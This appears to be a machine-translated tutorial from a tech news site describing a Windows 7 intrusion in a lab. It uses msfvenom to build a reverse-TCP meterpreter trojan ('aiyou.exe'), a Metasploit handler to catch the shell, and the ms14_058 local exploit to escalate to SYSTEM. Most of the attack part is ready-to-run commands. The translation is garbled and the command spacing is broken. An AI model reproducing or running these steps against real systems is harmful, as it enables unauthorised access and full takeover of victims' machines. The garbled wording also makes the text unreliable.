How to make use of the loophole of raising rights to enhance authority in big data's intranet penetration 02/28 Update SLTechnology News&Howtos

How to make use of the loophole of raising rights to enhance authority in big data's intranet penetration

2025-02-28 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Internet Technology >

Shulou(Shulou.com)06/01 Report--

This article introduces big data intranet penetration how to use the power loophole to enhance authority, the content is very detailed, interested friends can refer to, I hope it can be helpful to everyone.

Environment: minor attack: Kali 2020, IpRom 192.168.1.133

Small acceptance: win7 x86 PiPU 192.168.1.137

First, generate Trojans

1. Check the available payloads under Windows

Msfvenom-l payloads | grep windows | grep tcp

2. Select windows/meterpreter/reverse_tcp and generate Trojan horse

-p Select a payload

-l load list

-f generated file format

-e coding mode

-I number of coding

-b values avoided in the generated program

-x allows us to specify a custom executable as a template, that is, to bind the Trojan to this executable

Msfvenom-a x86-p windows/meterpreter/reverse_tcp LHOST=192.168.1.133 LPORT=4444-b "\ x00"-f exe > aiyou.exe

3. An aiyou.exe file will be generated under the / root directory

Second, listen to small receivers through Metasploit

1. Start Metasploit,use exploit/multi/handler

2. Set payload,set payload windows/meterpreter/reverse_tcp

3. Set monitoring, set lhost 192.168.1.133

4. Set the listening port, set lport 4444

5 、 run

6. Copy the generated aiyou.exe to the small recipient and run it, getuid view permissions, ordinary users

3. Entitlement loophole (ms14_058)

1. Loophole in the selection of rights: use exploit/windows/local/ms14_058_track_popup_menu

2. Check the parameters to be set: show options

3. Set session value: set session 1, execute run

4. Regenerate a session to view permissions

Meterpreter > getuid

Server username: NT AUTHORITY\ SYSTEM

Big data intranet penetration on how to use the power loophole to enhance authority to share here, I hope that the above content can be of some help to everyone, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.